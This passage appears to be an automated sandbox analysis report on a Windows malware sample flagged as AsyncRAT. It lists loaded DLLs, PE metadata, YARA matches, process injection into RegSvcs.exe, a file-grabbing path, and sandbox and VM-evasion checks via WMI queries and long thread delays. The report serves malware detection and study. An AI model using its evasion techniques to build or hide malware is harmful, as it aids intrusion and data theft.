Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File written: C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Jump to behavior

Source: 6mllsKaB2q.exe

Static file information: File size 1116672 > 1048576

Source: 6mllsKaB2q.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 6mllsKaB2q.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 6mllsKaB2q.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 6mllsKaB2q.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 6mllsKaB2q.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 6mllsKaB2q.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 6mllsKaB2q.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: winload_prod.pdb source: Temp.txt.7.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.7.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.7.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.7.dr
Source:	Binary string: wntdll.pdbUGP source: 6mllsKaB2q.exe, 00000001.00000003.1304187373.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, 6mllsKaB2q.exe, 00000001.00000003.1303557736.0000000003540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 6mllsKaB2q.exe, 00000001.00000003.1304187373.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, 6mllsKaB2q.exe, 00000001.00000003.1303557736.0000000003540000.00000004.00001000.00020000.00000000.sdmp

Source: 6mllsKaB2q.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 6mllsKaB2q.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 6mllsKaB2q.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 6mllsKaB2q.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 6mllsKaB2q.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00BB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_00BB42DE

Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BD0A76 push ecx; ret	1_2_00BD0A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05350538 push eax; ret	7_2_05350545
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0535EC58 push esp; iretd	7_2_0535EC59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05351790 push eax; iretd	7_2_0535179D

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6mllsKaB2q.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BCF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		1_2_00BCF98E
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C41C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		1_2_00C41C41

Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 6mllsKaB2q.exe PID: 7068, type: MEMORYSTR

Yara detected AsyncRAT

Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6mllsKaB2q.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_1-96363

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

API/Special instruction interceptor: Address: FB1C24

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 6mllsKaB2q.exe, 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599326	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597465	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597217	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597064	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596577	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594332	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2183			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7648			Jump to behavior

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

API coverage: 3.8 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

